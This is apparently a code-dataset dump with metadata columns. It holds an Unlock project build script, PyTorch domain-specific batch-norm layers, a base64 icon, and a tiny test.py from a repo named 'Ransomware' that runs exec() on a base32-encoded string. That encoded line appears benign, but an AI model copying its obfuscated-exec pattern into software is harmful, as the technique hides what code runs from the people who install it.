hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
373a4986c3029623b7ac46089c460814dba599fc
| 19,249
|
py
|
Python
|
unlock/bci/acquire-c++/build.py
|
NeuralProsthesisLab/unlock
|
0c4d95abdab288d3e657ca2db867b06f755f26ff
|
[
"BSD-3-Clause"
] | 6
|
2017-05-05T01:08:55.000Z
|
2021-08-03T21:50:07.000Z
|
unlock/bci/acquire-c++/build.py
|
NeuralProsthesisLab/unlock
|
0c4d95abdab288d3e657ca2db867b06f755f26ff
|
[
"BSD-3-Clause"
] | 1
|
2015-05-21T01:02:50.000Z
|
2015-05-21T16:03:43.000Z
|
unlock/bci/acquire-c++/build.py
|
NeuralProsthesisLab/unlock
|
0c4d95abdab288d3e657ca2db867b06f755f26ff
|
[
"BSD-3-Clause"
] | 4
|
2015-05-21T12:38:42.000Z
|
2022-03-28T15:47:58.000Z
|
# Copyright (c) James Percent and Unlock contributors.
# All rights reserved.
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Unlock nor the names of its contributors may be used
# to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from optparse import OptionParser
import subprocess
import logging
import inspect
import sys
import os
class Builder(object):
def __init__(self, platform):
super(Builder, self).__init__()
self.platform = str(platform).casefold()
def build(self):
ret = {
'win32'.casefold(): builder.build_windows,
'darwin'.casefold(): builder.build_darwin,
'linux'.casefold(): builder.build_linux
}.get(self.platform, builder.unsupported)()
return ret
def build_windows(self):
conf = None
logger = None
loglevel = logging.INFO
args = None
options = None
parser = None
usage = "usage: %prog [options]"
python = 'python.exe'
scons = 'scons-2.3.0.py'
lib_dir = os.path.join('lib', 'mac-x86-64-g++-10')
runtime_dir = os.path.join('..', 'acquire')
cwd = os.getcwd()
runtime_dir_help = 'sets the installation directory; defaults to ..\acquire'
lib_dir_help = 'sets the library directory to copy binaries to; default is lib\win-x86-msvc-10, relative the build directory'
clean_help = 'removes old binaries before building'
python_help = 'specifies the location of the python interpreter; default is c:\Python27\python.exe'
scons_help = 'specifies the location of the scons script; default is c:\Python27\Scripts\scons-2.3.0.py'
setup_help = 'configures the build environment for the first time; must be run with the first build'
build_help = 'builds the libraries and tests and copies them to the library directory'
parser = OptionParser(version="%prog 1.0", usage=usage)
parser.add_option('-n', '--runtime-dir', dest='runtime_dir', action='store_true', default=False,
metavar='RUNTIME_DIR', help=runtime_dir_help)
parser.add_option('-p', '--python', dest='python', action='store_true', default=False, metavar='PYTHON',
help=python_help)
parser.add_option('-o', '--scons', dest='scons', action='store_true', default=False, metavar='SCONS',
help=scons_help)
parser.add_option('-l', '--lib-dir', dest='lib_dir', action='store_true', default=False, metavar='LIB_DIR',
help=lib_dir_help)
parser.add_option('-c', '--clean', dest='clean', action='store_true', default=False, metavar='CLEAN',
help=clean_help)
parser.add_option('-s', '--setup', dest='setup', action='store_true', default=False, metavar='SETUP',
help=setup_help)
parser.add_option('-i', '--install', dest='install', action='store_true', default=False, metavar='install',
help=setup_help)
parser.add_option('-b', '--build', dest='build', action='store_true', default=False, metavar='build',
help=build_help)
(options, args) = parser.parse_args()
redirect = {'stdin': sys.stdin, 'stdout': sys.stdout, 'stderr': sys.stderr}
if options.setup:
install_includes = ['tar', 'xzvf', 'includes.tar.gz']
subprocess.check_call(install_includes, **redirect)
install_python27 = ['cmd', '/C install-python27.bat']
subprocess.check_call(install_python27, **redirect)
os.chdir(os.path.join('..', '..', '..', 'package'))
untar_scons = ['tar', 'zxvf', 'scons-2.3.0.tar.gz']
subprocess.check_call(untar_scons, **redirect)
os.chdir('scons-2.3.0')
install_scons230 = ['C:\Python27\python.exe', 'setup.py', 'install']
subprocess.check_call(install_scons230, **redirect)
os.chdir(cwd)
if options.python:
python = options.python
if options.scons:
scons = options.scons
if options.clean:
subprocess.check_call([python, scons, '-c'], **redirect)
if options.lib_dir:
lib_dir = options.lib_dir
if options.build:
# XXX - For fsck(2) sake fix me; this stuff is specified in serveral places. We should generate the
# SConstruct file from this file.
subprocess.check_call([python, scons, '-Q'], **redirect)
ns_dll = 'neuralsignal_win_x86.dll'
ns_test_dll = 'neuralsignal-unit-tests.exe'
random_dll = 'random_signal_win_x86.dll'
random_test_dll = 'random-unit-tests.exe'
mobilab_dll = 'mobilab_signal_win_x86.dll'
mobilab_test_dll = 'mobilab-unit-tests.exe'
enobio_dll = 'enobio_signal_win_x86.dll'
enobio_test_dll = 'enobio-unit-tests.exe'
nidaq_dll = 'nidaq_signal_win_x86.dll'
nidaq_test_dll = 'nidaq-unit-tests.exe'
ns = os.path.join(cwd, ns_dll)
ns_dest = os.path.join(cwd, lib_dir, ns_dll)
ns_dest_python = os.path.join(cwd, lib_dir, 'neuralsignal.pyd')
ns_test = os.path.join(cwd, ns_test_dll)
ns_test_dest = os.path.join(cwd, lib_dir, ns_test_dll)
random = os.path.join(cwd, random_dll)
random_dest = os.path.join(cwd, lib_dir, random_dll)
random_dest_python = os.path.join(cwd, lib_dir, 'random_signal.pyd')
random_test = os.path.join(cwd, random_test_dll)
random_test_dest = os.path.join(cwd, lib_dir, random_test_dll)
mobilab = os.path.join(cwd, mobilab_dll)
mobilab_dest = os.path.join(cwd, lib_dir, mobilab_dll)
mobilab_dest_python = os.path.join(cwd, lib_dir, 'mobilab_signal.pyd')
mobilab_test = os.path.join(cwd, mobilab_test_dll)
mobilab_test_dest = os.path.join(cwd, lib_dir, mobilab_test_dll)
enobio = os.path.join(cwd, enobio_dll)
enobio_dest = os.path.join(cwd, lib_dir, enobio_dll)
enobio_dest_python = os.path.join(cwd, lib_dir, 'enobio_signal.pyd')
enobio_test = os.path.join(cwd, enobio_test_dll)
enobio_test_dest = os.path.join(cwd, lib_dir, enobio_test_dll)
nidaq = os.path.join(cwd, nidaq_dll)
nidaq_dest = os.path.join(cwd, lib_dir, nidaq_dll)
nidaq_dest_python = os.path.join(cwd, lib_dir, 'nidaq_signal.pyd')
nidaq_test = os.path.join(cwd, nidaq_test_dll)
nidaq_test_dest = os.path.join(cwd, lib_dir, nidaq_test_dll)
copy_ns = ['cp', ns, ns_dest]
copy_ns_python = ['cp', ns, ns_dest_python]
copy_ns_test = ['cp', ns_test, ns_test_dest]
copy_random = ['cp', random, random_dest]
copy_random_python = ['cp', random, random_dest_python]
copy_random_test = ['cp', random_test, random_test_dest]
copy_mobilab = ['cp', mobilab, mobilab_dest]
copy_mobilab_python = ['cp', mobilab, mobilab_dest_python]
copy_mobilab_test = ['cp', mobilab_test, mobilab_test_dest]
copy_enobio = ['cp', enobio, enobio_dest]
copy_enobio_python = ['cp', enobio, enobio_dest_python]
copy_enobio_test = ['cp', enobio_test, enobio_test_dest]
copy_nidaq = ['cp', nidaq, nidaq_dest]
copy_nidaq_python = ['cp', nidaq, nidaq_dest_python]
copy_nidaq_test = ['cp', nidaq_test, nidaq_test_dest]
# execute the commands
subprocess.check_call(copy_ns, **redirect)
subprocess.check_call(copy_enobio_python, **redirect)
subprocess.check_call(copy_ns_test, **redirect)
subprocess.check_call(copy_random, **redirect)
subprocess.check_call(copy_random_python, **redirect)
subprocess.check_call(copy_random_test, **redirect)
subprocess.check_call(copy_enobio, **redirect)
subprocess.check_call(copy_enobio_python, **redirect)
subprocess.check_call(copy_enobio_test, **redirect)
subprocess.check_call(copy_mobilab, **redirect)
subprocess.check_call(copy_mobilab_python, **redirect)
subprocess.check_call(copy_mobilab_test, **redirect)
subprocess.check_call(copy_nidaq, **redirect)
subprocess.check_call(copy_nidaq_python, **redirect)
subprocess.check_call(copy_nidaq_test, **redirect)
if options.runtime_dir:
runtime_dir = options.runtime_dir
if options.install:
def install_file(file_name):
libs = os.path.join(cwd, lib_dir, file_name)
dest = os.path.join(cwd, runtime_dir, file_name)
install_command = ['cp', libs, dest]
subprocess.check_call(install_command, **redirect)
for root, dirs, files in os.walk(os.path.join(cwd, lib_dir), topdown=False):
for file in files:
if file.endswith('dll') or file.endswith('exe') or file.endswith('pyd'):
install_file(file)
def unsupported(self):
raise RuntimeError('Unsupported OS '+ self.platform)
def build_linux(self):
return self.unsupported()
def build_darwin(self):
conf = None
logger = None
loglevel = logging.INFO
args = None
options = None
parser = None
usage = "usage: %prog [options]"
python = 'C:\Python27\python.exe'
scons = 'C:\Python27\Scripts\scons-2.3.0.py'
lib_dir = os.path.join('lib', 'win-x86-msvc-10')
runtime_dir = os.path.join('..', 'acquire')
cwd = os.getcwd()
runtime_dir_help = 'sets the installation directory; defaults to ..\acquire'
lib_dir_help = 'sets the library directory to copy binaries to; default is lib\win-x86-msvc-10, relative the build directory'
clean_help = 'removes old binaries before building'
python_help = 'specifies the location of the python interpreter; default is c:\Python27\python.exe'
scons_help = 'specifies the location of the scons script; default is c:\Python27\Scripts\scons-2.3.0.py'
setup_help = 'configures the build environment for the first time; must be run with the first build'
build_help = 'builds the libraries and tests and copies them to the library directory'
parser = OptionParser(version="%prog 1.0", usage=usage)
parser.add_option('-n', '--runtime-dir', dest='runtime_dir', action='store_true', default=False,
metavar='RUNTIME_DIR', help=runtime_dir_help)
parser.add_option('-p', '--python', dest='python', action='store_true', default=False, metavar='PYTHON',
help=python_help)
parser.add_option('-o', '--scons', dest='scons', action='store_true', default=False, metavar='SCONS',
help=scons_help)
parser.add_option('-l', '--lib-dir', dest='lib_dir', action='store_true', default=False, metavar='LIB_DIR',
help=lib_dir_help)
parser.add_option('-c', '--clean', dest='clean', action='store_true', default=False, metavar='CLEAN',
help=clean_help)
parser.add_option('-s', '--setup', dest='setup', action='store_true', default=False, metavar='SETUP',
help=setup_help)
parser.add_option('-i', '--install', dest='install', action='store_true', default=False, metavar='install',
help=setup_help)
parser.add_option('-b', '--build', dest='build', action='store_true', default=False, metavar='build',
help=build_help)
(options, args) = parser.parse_args()
redirect = {'stdin': sys.stdin, 'stdout': sys.stdout, 'stderr': sys.stderr}
if options.setup:
install_includes = ['tar', 'xzvf', 'includes.tar.gz']
subprocess.check_call(install_includes, **redirect)
install_python27 = ['cmd', '/C install-python27.bat']
subprocess.check_call(install_python27, **redirect)
os.chdir(os.path.join('..', '..', '..', 'package'))
untar_scons = ['tar', 'zxvf', 'scons-2.3.0.tar.gz']
subprocess.check_call(untar_scons, **redirect)
os.chdir('scons-2.3.0')
install_scons230 = ['C:\Python27\python.exe', 'setup.py', 'install']
subprocess.check_call(install_scons230, **redirect)
os.chdir(cwd)
if options.python:
python = options.python
if options.scons:
scons = options.scons
if options.clean:
subprocess.check_call([python, scons, '-c'], **redirect)
if options.lib_dir:
lib_dir = options.lib_dir
if options.build:
# XXX - For fsck(2) sake fix me; this stuff is specified in serveral places. We should generate the
# SConstruct file from this file.
subprocess.check_call([python, scons, '-Q'], **redirect)
ns_dll = 'neuralsignal_win_x86.dll'
ns_test_dll = 'neuralsignal-unit-tests.exe'
random_dll = 'random_signal_win_x86.dll'
random_test_dll = 'random-unit-tests.exe'
mobilab_dll = 'mobilab_signal_win_x86.dll'
mobilab_test_dll = 'mobilab-unit-tests.exe'
enobio_dll = 'enobio_signal_win_x86.dll'
enobio_test_dll = 'enobio-unit-tests.exe'
nidaq_dll = 'nidaq_signal_win_x86.dll'
nidaq_test_dll = 'nidaq-unit-tests.exe'
ns = os.path.join(cwd, ns_dll)
ns_dest = os.path.join(cwd, lib_dir, ns_dll)
ns_dest_python = os.path.join(cwd, lib_dir, 'neuralsignal.pyd')
ns_test = os.path.join(cwd, ns_test_dll)
ns_test_dest = os.path.join(cwd, lib_dir, ns_test_dll)
random = os.path.join(cwd, random_dll)
random_dest = os.path.join(cwd, lib_dir, random_dll)
random_dest_python = os.path.join(cwd, lib_dir, 'random_signal.pyd')
random_test = os.path.join(cwd, random_test_dll)
random_test_dest = os.path.join(cwd, lib_dir, random_test_dll)
mobilab = os.path.join(cwd, mobilab_dll)
mobilab_dest = os.path.join(cwd, lib_dir, mobilab_dll)
mobilab_dest_python = os.path.join(cwd, lib_dir, 'mobilab_signal.pyd')
mobilab_test = os.path.join(cwd, mobilab_test_dll)
mobilab_test_dest = os.path.join(cwd, lib_dir, mobilab_test_dll)
enobio = os.path.join(cwd, enobio_dll)
enobio_dest = os.path.join(cwd, lib_dir, enobio_dll)
enobio_dest_python = os.path.join(cwd, lib_dir, 'enobio_signal.pyd')
enobio_test = os.path.join(cwd, enobio_test_dll)
enobio_test_dest = os.path.join(cwd, lib_dir, enobio_test_dll)
nidaq = os.path.join(cwd, nidaq_dll)
nidaq_dest = os.path.join(cwd, lib_dir, nidaq_dll)
nidaq_dest_python = os.path.join(cwd, lib_dir, 'nidaq_signal.pyd')
nidaq_test = os.path.join(cwd, nidaq_test_dll)
nidaq_test_dest = os.path.join(cwd, lib_dir, nidaq_test_dll)
copy_ns = ['cp', ns, ns_dest]
copy_ns_python = ['cp', ns, ns_dest_python]
copy_ns_test = ['cp', ns_test, ns_test_dest]
copy_random = ['cp', random, random_dest]
copy_random_python = ['cp', random, random_dest_python]
copy_random_test = ['cp', random_test, random_test_dest]
copy_mobilab = ['cp', mobilab, mobilab_dest]
copy_mobilab_python = ['cp', mobilab, mobilab_dest_python]
copy_mobilab_test = ['cp', mobilab_test, mobilab_test_dest]
copy_enobio = ['cp', enobio, enobio_dest]
copy_enobio_python = ['cp', enobio, enobio_dest_python]
copy_enobio_test = ['cp', enobio_test, enobio_test_dest]
copy_nidaq = ['cp', nidaq, nidaq_dest]
copy_nidaq_python = ['cp', nidaq, nidaq_dest_python]
copy_nidaq_test = ['cp', nidaq_test, nidaq_test_dest]
# execute the commands
subprocess.check_call(copy_ns, **redirect)
subprocess.check_call(copy_enobio_python, **redirect)
subprocess.check_call(copy_ns_test, **redirect)
subprocess.check_call(copy_random, **redirect)
subprocess.check_call(copy_random_python, **redirect)
subprocess.check_call(copy_random_test, **redirect)
subprocess.check_call(copy_enobio, **redirect)
subprocess.check_call(copy_enobio_python, **redirect)
subprocess.check_call(copy_enobio_test, **redirect)
subprocess.check_call(copy_mobilab, **redirect)
subprocess.check_call(copy_mobilab_python, **redirect)
subprocess.check_call(copy_mobilab_test, **redirect)
subprocess.check_call(copy_nidaq, **redirect)
subprocess.check_call(copy_nidaq_python, **redirect)
subprocess.check_call(copy_nidaq_test, **redirect)
if options.runtime_dir:
runtime_dir = options.runtime_dir
if options.install:
def install_file(file_name):
libs = os.path.join(cwd, lib_dir, file_name)
dest = os.path.join(cwd, runtime_dir, file_name)
install_command = ['cp', libs, dest]
subprocess.check_call(install_command, **redirect)
for root, dirs, files in os.walk(os.path.join(cwd, lib_dir), topdown=False):
for file in files:
if file.endswith('dll') or file.endswith('exe') or file.endswith('pyd'):
install_file(file)
return self.unsupported()
if __name__ == '__main__':
builder = Builder(sys.platform)
builder.build()
| 46.160671
| 133
| 0.631617
| 2,465
| 19,249
| 4.699391
| 0.117647
| 0.032113
| 0.053522
| 0.062845
| 0.863691
| 0.856699
| 0.856699
| 0.856699
| 0.855318
| 0.855318
| 0
| 0.007872
| 0.254247
| 19,249
| 416
| 134
| 46.271635
| 0.799094
| 0.095434
| 0
| 0.89701
| 0
| 0.013289
| 0.164049
| 0.036941
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026578
| false
| 0
| 0.019934
| 0.003322
| 0.059801
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
37acc2ab04dac4d752a95c705ee08c1d0e666f8e
| 186
|
py
|
Python
|
test.py
|
ABDELILAH-OUHAJJOU/Ransomware-1
|
45754768ebafc87ff54158a0a2b3edc03b59d412
|
[
"MIT"
] | 58
|
2020-04-28T17:12:25.000Z
|
2022-03-30T18:53:50.000Z
|
test.py
|
ABDELILAH-OUHAJJOU/Ransomware-1
|
45754768ebafc87ff54158a0a2b3edc03b59d412
|
[
"MIT"
] | 2
|
2020-05-18T14:35:35.000Z
|
2022-03-17T09:49:39.000Z
|
test.py
|
ABDELILAH-OUHAJJOU/Ransomware-1
|
45754768ebafc87ff54158a0a2b3edc03b59d412
|
[
"MIT"
] | 13
|
2020-06-28T16:17:35.000Z
|
2022-02-15T08:20:08.000Z
|
import marshal, base64
exec(base64.b32decode("MZZG63JAO5QXE3TBEBUW24DPOJ2CA4DFNRQW4Z3JBIFHAZLMMFXGO2JIEJYGYZLBONSSA53BNF2CELBXFQZCSIBDMFZGO4Z5FA6HO33SMRZT4LB4ORUW2ZJ6FQ6HIYLCHYUQU==="))
| 62
| 162
| 0.919355
| 7
| 186
| 24.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164835
| 0.021505
| 186
| 2
| 163
| 93
| 0.774725
| 0
| 0
| 0
| 0
| 0
| 0.731183
| 0.731183
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
808421f1f77813f35c36d3c438e545cb6f342521
| 2,509
|
py
|
Python
|
dalib/adaptation/idm/models/dsbn.py
|
neka-nat/Transfer-Learning-Library
|
a3b27b0d7562fa90a02e914140b37ab438469e6c
|
[
"MIT"
] | 1,474
|
2020-07-24T02:55:55.000Z
|
2022-03-31T12:35:56.000Z
|
dalib/adaptation/idm/models/dsbn.py
|
neka-nat/Transfer-Learning-Library
|
a3b27b0d7562fa90a02e914140b37ab438469e6c
|
[
"MIT"
] | 70
|
2020-08-05T10:47:33.000Z
|
2022-03-31T03:48:54.000Z
|
dalib/adaptation/idm/models/dsbn.py
|
neka-nat/Transfer-Learning-Library
|
a3b27b0d7562fa90a02e914140b37ab438469e6c
|
[
"MIT"
] | 312
|
2020-08-01T11:08:39.000Z
|
2022-03-30T06:03:47.000Z
|
import torch
import torch.nn as nn
class DSBN2d(nn.Module):
def __init__(self, planes):
super(DSBN2d, self).__init__()
self.num_features = planes
self.BN_S = nn.BatchNorm2d(planes)
self.BN_T = nn.BatchNorm2d(planes)
def forward(self, x):
if not self.training:
return self.BN_T(x)
bs = x.size(0)
assert (bs % 2 == 0)
split = torch.split(x, int(bs / 2), 0)
out1 = self.BN_S(split[0].contiguous())
out2 = self.BN_T(split[1].contiguous())
out = torch.cat((out1, out2), 0)
return out
class DSBN1d(nn.Module):
def __init__(self, planes):
super(DSBN1d, self).__init__()
self.num_features = planes
self.BN_S = nn.BatchNorm1d(planes)
self.BN_T = nn.BatchNorm1d(planes)
def forward(self, x):
if not self.training:
return self.BN_T(x)
bs = x.size(0)
assert (bs % 2 == 0)
split = torch.split(x, int(bs / 2), 0)
out1 = self.BN_S(split[0].contiguous())
out2 = self.BN_T(split[1].contiguous())
out = torch.cat((out1, out2), 0)
return out
class DSBN2d_idm(nn.Module):
def __init__(self, planes):
super(DSBN2d_idm, self).__init__()
self.num_features = planes
self.BN_S = nn.BatchNorm2d(planes)
self.BN_T = nn.BatchNorm2d(planes)
self.BN_mix = nn.BatchNorm2d(planes)
def forward(self, x):
if not self.training:
return self.BN_T(x)
bs = x.size(0)
assert (bs % 3 == 0)
split = torch.split(x, int(bs / 3), 0)
out1 = self.BN_S(split[0].contiguous())
out2 = self.BN_T(split[1].contiguous())
out3 = self.BN_mix(split[2].contiguous())
out = torch.cat((out1, out2, out3), 0)
return out
class DSBN1d_idm(nn.Module):
def __init__(self, planes):
super(DSBN1d_idm, self).__init__()
self.num_features = planes
self.BN_S = nn.BatchNorm1d(planes)
self.BN_T = nn.BatchNorm1d(planes)
self.BN_mix = nn.BatchNorm1d(planes)
def forward(self, x):
if not self.training:
return self.BN_T(x)
bs = x.size(0)
assert (bs % 3 == 0)
split = torch.split(x, int(bs / 3), 0)
out1 = self.BN_S(split[0].contiguous())
out2 = self.BN_T(split[1].contiguous())
out3 = self.BN_mix(split[2].contiguous())
out = torch.cat((out1, out2, out3), 0)
return out
| 28.83908
| 49
| 0.565165
| 355
| 2,509
| 3.814085
| 0.121127
| 0.106352
| 0.062038
| 0.044313
| 0.966765
| 0.940916
| 0.940916
| 0.940916
| 0.830133
| 0.830133
| 0
| 0.040793
| 0.296532
| 2,509
| 86
| 50
| 29.174419
| 0.726346
| 0
| 0
| 0.828571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.057143
| 1
| 0.114286
| false
| 0
| 0.028571
| 0
| 0.314286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
80d77cde655ebcf42d65132957d6b6a04abbd5d6
| 2,859
|
py
|
Python
|
b64.py
|
waterpepene/Window-Wizard
|
efc2c5624d29da1f687dac5b6412daa1e463f4fc
|
[
"MIT"
] | 2
|
2020-08-19T18:59:27.000Z
|
2021-01-29T09:25:25.000Z
|
b64.py
|
waterpepene/Window-Wizard
|
efc2c5624d29da1f687dac5b6412daa1e463f4fc
|
[
"MIT"
] | null | null | null |
b64.py
|
waterpepene/Window-Wizard
|
efc2c5624d29da1f687dac5b6412daa1e463f4fc
|
[
"MIT"
] | null | null | null |
quiticon = b'iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAYAAAGXcA1uAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAALtSURBVDhPrZU/TFNRFMZbKCGv9RmMBUw0LnVwchCY3AyaSNQYXIyaGHR0F00cXXQzcXCBGOLAAg7GP4NuooMJRicHGBBNoZg2bdpS6R/9fZf7XtrXlhLDl3zv3HvOPefee+5594ZD4C+Q7NIHnLVyG9VqtRT2htRqtY/qLNJ+hKwYn3A4PItlVG1Fk9WHXL3I6nyXQlDfNxDiODQwCqYdswPr0dsFLtuBBow9A936Oa7AOVY0QzctxZQ1+Ein0zO+QVC7WCzeQ8b8UAJT3HIc5zNNx0vXVLlcPtfT03Nf/SCIcjIajd6m2W8UcoANWRFKpdLdfD7/Ctswi80i48ZQ74D0MxZAgVUMNazV4hf8YZmRQsDhRSQS+ep1Wi5pbW0tAUewjUIh7m8a3iAbfsR6YOvF5tLsNx3ObwG5I3TGclZFaecbhULhSSwW+yJlEGz2ASl/o/PQDHETgnVaexOwLUJzwq2yZMAAN5vNruZyuUss55tVG4M/A+yDqipxAmrtZcQ08lArh4vbzWZsbW3NIbraLikINn0hlUo5QYc89E75pxQWOaKfGhwcLLTNEn2jp1I/kdbrFN9EgwEEHbqXl5e1eQd2TiuHVE0kErPITasy8B2IMA832vCEHRbyik/l8RDepF1FFon8R7bdAr9eRBS/buQ0nKT9WzZv36pwQftrW1btIB/rKyiW+Zt3fc71wLk7mUweW1paumr/R8eaWkOz2VmFjjvA7o+nhEsqBV1/KodKpfJUJYEpZoe3nwB5Gr6HKwGuwjQMIkvw51C7iihGpxTtg4fh0QCPwAMwiP0c7DW4kMlkptfX1xsv9D1CkVS